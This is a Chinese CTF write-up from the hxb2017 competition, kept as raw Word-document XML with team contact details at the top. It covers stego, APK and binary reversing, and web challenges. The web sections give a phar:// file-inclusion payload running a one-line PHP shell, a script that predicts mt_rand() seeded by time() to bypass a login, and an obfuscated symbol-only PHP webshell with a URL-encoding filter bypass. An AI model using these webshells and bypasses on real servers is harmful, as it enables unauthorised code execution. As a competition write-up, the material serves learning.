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hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队伍名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DedSeC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联系电话：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>17709007717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联系邮箱：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>568093910@qq.com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流量分析</w:t>
      </w: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5262245" cy="2991485"/>
            <wp:effectExtent l="0" t="0" r="146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Wireshark导出http文件发现flag.zip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打开是rgb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165" cy="7952105"/>
            <wp:effectExtent l="0" t="0" r="63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795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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="36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用脚本把rgb转换成图片</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLine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494915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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="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1770" cy="633730"/>
            <wp:effectExtent l="0" t="0" r="508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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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热身运动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="36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使用stegoslove查看每一帧的坐标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4075" cy="4943475"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525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9"/>
        <w:ind w:left="36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记录下来</w:t>
      </w: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1438275" cy="5076190"/>
            <wp:effectExtent l="0" t="0" r="952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07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百度百科64进制编码得到一张表，对应坐标写出数字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547995"/>
            <wp:effectExtent l="0" t="0" r="3810" b="14605"/>
            <wp:docPr id="6" name="图片 6" descr="`](]0PAJF$$_EW`2OU`DO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`](]0PAJF$$_EW`2OU`DO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465320"/>
            <wp:effectExtent l="0" t="0" r="8255" b="11430"/>
            <wp:docPr id="9" name="图片 9" descr="TUZIMB4ATF`O(OEXTB}5G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UZIMB4ATF`O(OEXTB}5GC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再对应数字写出相应的字母进行base64解码得到flag</w:t>
      </w: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5271770" cy="773430"/>
            <wp:effectExtent l="0" t="0" r="508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4790440" cy="3009265"/>
            <wp:effectExtent l="0" t="0" r="1016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题目: Encryptor.apk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逆向apk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">用和简单的android一样的套路拿到java代码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24900" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="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05900" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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15860" cy="4180840"/>
            <wp:effectExtent l="0" t="0" r="8890" b="10160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1586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得到关键加密代码</w:t>
      </w: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5273675" cy="1426845"/>
            <wp:effectExtent l="0" t="0" r="3175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加密过程为：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j是md5以后的字符串换成字节了以后的长度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paramArrayOfByte1[i]是图片的每一个字节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用图片的每一个字节和md5字符串的第[i%j]号字节异或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因为是异或加密，解密只需要再加密一次即可得到明文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04615" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="63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这里限制了加密文件必须为图片，把密文后缀改为jpg放入加密机进行加密</w:t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91230" cy="5985510"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1524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598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得到flag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7045" cy="5381625"/>
            <wp:effectExtent l="0" t="0" r="1905" b="952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题目: misc300</w:t>
      </w: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Pkl为python序列化文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="5682615"/>
            <wp:effectExtent l="0" t="0" r="5715" b="133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8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读取之后根据第一句可知这是一张图片</w:t>
      </w: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根据坐标画出散点图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="4445000"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270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</w:pP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这是漫画凯文的幻虎世界的人物，作者为Bill Watterson</w:t>
      </w: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Flag为作者的名字 billwatterson </w:t>
      </w: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WEB200：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题目提示：只是一个普通的上传。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打开页面以后得到亮点提示：a.只能上传png  b.</w:t>
      </w:r>
      <w:r>
        <w:t>htmlentities(ucfirst($op));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> op变量做过简单的处理。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打开upload页面发现http://118.190.87.135:10080/?op=upload  ==&gt;  op=upload应该是文件包含。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扫描一下目录：upload.php、home.php、flag.php、show.php加上两个目录image和uploads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包含一下flag.php看看，应该不会这么简单：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16150"/>
            <wp:effectExtent l="0" t="0" r="317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不行，按照正常路子走，上传一个png：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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735455"/>
            <wp:effectExtent l="0" t="0" r="11430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页面返回URL:  op=show&amp;imagekey=cf32f1071d5f2a4b89c72df04a1b5de02dce2bf1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到这里就更加印证了是一个文件包含漏洞了，这个imagekey应该就是上传后的文件名，上传的文件应该是在uploads文件下：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2880" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="139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果然，接下来要包含它。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770" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="508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重新思考了一下，包含upload.php的时候，是op=upload 那么其代码应该是op=$_GET[op].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.php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;在文件中加上php的，这时候我想到phar://协议。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将x.php(一句话shell)压缩成zip格式，然后再改成png格式上传到服务器，用包含结合phar协议来执行php文件：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Payload：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op=phar://./uploads/e3b413b087bd7f56d3a67d3f970a88c489b60e66.png/x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690" cy="2265680"/>
            <wp:effectExtent l="0" t="0" r="1016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Ok，可以执行，接下来就是读取flag.php中的内容了。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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Payload：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x=highlight_file('././flag.php');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"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055" cy="3348990"/>
            <wp:effectExtent l="0" t="0" r="1079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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Web150 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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这道题是相当的坑，11点出了以后到4点左右才正常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="416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像这样的题，进去没什么提示，首先想到的源代码泄露，然后审计代码绕过一些的。访问.index.php.swp存在，这个是vi编辑器留下的，但是在11点-4点之间这段时间，这个里面根本没有源码，和index一样是乱码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="416" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="5138420"/>
            <wp:effectExtent l="0" t="0" r="7620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源码看到以后，就发现是mt_rand()伪加密，mt_srand()以time()为种子进行播种，mt_rand()生成的内容是依赖于time()的。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思路：用python直接访问页面拿到pwd的值，在time()生成的时间戳变化之前提交上去，就可以绕过第一层if($pwd == $_GET[pwd])，但是这乱码是什么东东？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把源码放在本地，然后去生成、输出pwd 和 session。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="416" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1355090"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1651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还是乱码，那可能pwd就是乱码，ok。写个脚本，让脚本先访问题目地址，处理题目地址返回页面，取出pwd的值，再访问本地页面对比pwd的值，如果相同，则把本地页面生成的pwd、session的值分别作为pwd参数和action参数的值提交上去。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5271770" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="5080" b="952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Flag为：you get the flag it is hxb2017{6583be26c1403c25677c03ac7b3d1f22}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Python：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requests,re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#re_pass = re.compile(r'&lt;br&gt;.+||')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 = "http://114.215.138.89:10080/"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True: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 = requests.get(url)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 = res.content[29:-8]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 s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resloaction = requests.get("http://127.0.0.1/test.php")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 = resloaction.content.split(' ')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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params={}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list[0]==s :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params['login']=list[1]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params['pwd']=s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#params['login']=s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resp = requests.get(url,params=params)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'flag' in resp.content :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 resp.content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elif 'Wrong' in resp.content :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 'Wrong'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elif 'first' in resp.content :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 'first'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:pass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本地页面源码：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&lt;?php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create_password($pw_length =  10){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$randpwd = "";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($i = 0; $i &lt; $pw_length; $i++){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$randpwd .= chr(mt_rand(100, 200));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$randpwd;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mt_srand(time());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$pwd=create_password();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$pwd.' ';    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//echo "&lt;br&gt;";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create_password(32).rand();</w:t>
      </w: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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="36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续测试中发现，用此python脚本并不能把flag很快的拿到，原因在于create_password(32).rand()的rand()上，第一次能快速拿到可能是刚好rand()在我本地生成的值和在题目服务器生成的一致。但是还是能够拿到flag的，请看下图。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9"/>
        <w:ind w:left="360" w:firstLine="416" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3079115"/>
            <wp:effectExtent l="0" t="0" r="5080" b="698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left="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WEB300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访问看到源码，过滤了很多字符，但是()[]=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+.;这些字符没过滤，题目又提示能getshell。这让我想起了以前在网上看到过的一个符号一句话木马。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找了很久终于找到了符号一句话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&lt;?php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$_=[].[];$__='';$_=$_[''];$_=++$_;$_=++$_;$_=++$_;$_=++$_;$__.=$_;$_=++$_;$_=++$_;$__=$_.$__;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$__.=$_;${'_'.$__}[_](${'_'.$__}[__]);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?&gt;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但是提交却被拦截。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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991870"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1778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又看了一遍字符过滤的数组里面的确没有+啊。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在本地写一个php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&lt;?php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$a = $_GET[x];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$a;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看下+传入以后输出会怎么样？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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675" cy="3274060"/>
            <wp:effectExtent l="0" t="0" r="3175" b="254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空白？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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685415"/>
            <wp:effectExtent l="0" t="0" r="6350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原来，+在url中表示空格，而题目拦截空格。所以要把+ 进行一次URL编码，传入后会自动进行解码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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2020570"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1778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将符号一句话中的+全部用%2b替换</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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1084580"/>
            <wp:effectExtent l="0" t="0" r="10160" b="127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4310" cy="1868170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1778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用highlight_file效果是一样的。</w:t>
      </w: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题目:简单的android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直接拖进android killer挂了，那么直接解压拿到jar文件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解压后用dex2jar把classes.dex换成jar包：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5121275" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="3175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用jd-gui打开，发现代码中直接就包含了flag明文。没安装测试，直接交就过了</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3156585"/>
            <wp:effectExtent l="0" t="0" r="6985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题目:re100.发现是win，还有upx壳，用3.91版的upx -d解压成功</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1367790"/>
            <wp:effectExtent l="0" t="0" r="444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解压后直接运行会挂掉，ida打开，main函数就在启动函数上面几个（通过字符串提示发现main函数）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2409825"/>
            <wp:effectExtent l="0" t="0" r="3810" b="952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代码不多，按f5可以得到如下c代码。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4915535" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="1841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虽然很多函数没有识别，但是不影响这些分析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发现一堆没用的代码，其实关键的就是圈中的代码而已。这里的输入才会影响后面的结果。至于判断条件，if嵌套if，似乎不可能达成这些条件，应该是程序挂掉的原因。所以，直接进入关键函数（sub_401080）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4953635" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="18415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明显是按位异或，供44个字符，每个和0x22异或后等于相应的值就可以，反向计算拿到flag。但是要注意顺序，读取的行数是换了的，而且注意低存低高存高。。。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2532380"/>
            <wp:effectExtent l="0" t="0" r="571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本来想用idc脚本把数据抠出来，然后异或就好了。但是出了点问题，会读取出特别大的数字，只能一个一个手动弄出来。按照行的顺序，每一行从右边到左边。然后写python脚本如下：</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4054475" cy="3375660"/>
            <wp:effectExtent l="0" t="0" r="3175" b="152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在eclipse中执行得到如下结果：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3675" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="3175" b="952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9"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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4F5DFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F4F5DF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E44BD"/>
    <w:rsid w:val="00037C84"/>
    <w:rsid w:val="0007453B"/>
    <w:rsid w:val="00105E84"/>
    <w:rsid w:val="00142E96"/>
    <w:rsid w:val="00240D8B"/>
    <w:rsid w:val="00283002"/>
    <w:rsid w:val="00341191"/>
    <w:rsid w:val="003934B7"/>
    <w:rsid w:val="003E7A81"/>
    <w:rsid w:val="00455756"/>
    <w:rsid w:val="00487BE6"/>
    <w:rsid w:val="00793AA1"/>
    <w:rsid w:val="007B5FF9"/>
    <w:rsid w:val="007E53EA"/>
    <w:rsid w:val="00805586"/>
    <w:rsid w:val="0098123B"/>
    <w:rsid w:val="00AE1A2A"/>
    <w:rsid w:val="00AE44BD"/>
    <w:rsid w:val="00B730ED"/>
    <w:rsid w:val="00CF2C5D"/>
    <w:rsid w:val="00F84A85"/>
    <w:rsid w:val="0D735CFB"/>
    <w:rsid w:val="0F2A5D2C"/>
    <w:rsid w:val="10417CE8"/>
    <w:rsid w:val="1AB6471E"/>
    <w:rsid w:val="2403628B"/>
    <w:rsid w:val="29F73603"/>
    <w:rsid w:val="364A66B5"/>
    <w:rsid w:val="3758625E"/>
    <w:rsid w:val="3B090FA6"/>
    <w:rsid w:val="52DC588F"/>
    <w:rsid w:val="547908B3"/>
    <w:rsid w:val="5EAE3506"/>
    <w:rsid w:val="5FF107B0"/>
    <w:rsid w:val="647E1BA9"/>
    <w:rsid w:val="649C3CB5"/>
    <w:rsid w:val="674B0A42"/>
    <w:rsid w:val="6C1B28F6"/>
    <w:rsid w:val="78BC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7">
    <w:name w:val="页眉 Char"/>
    <w:basedOn w:val="5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semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18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Char"/>
    <w:basedOn w:val="5"/>
    <w:link w:val="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http://www.deepbbs.org</Company>
  <Pages>1</Pages>
  <Words>10</Words>
  <Characters>62</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>71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2016-11-11T06:25:00Z</dcterms:created>
  <dc:creator>deeplm</dc:creator>
  <cp:lastModifiedBy>AresX</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-25T16:50:05Z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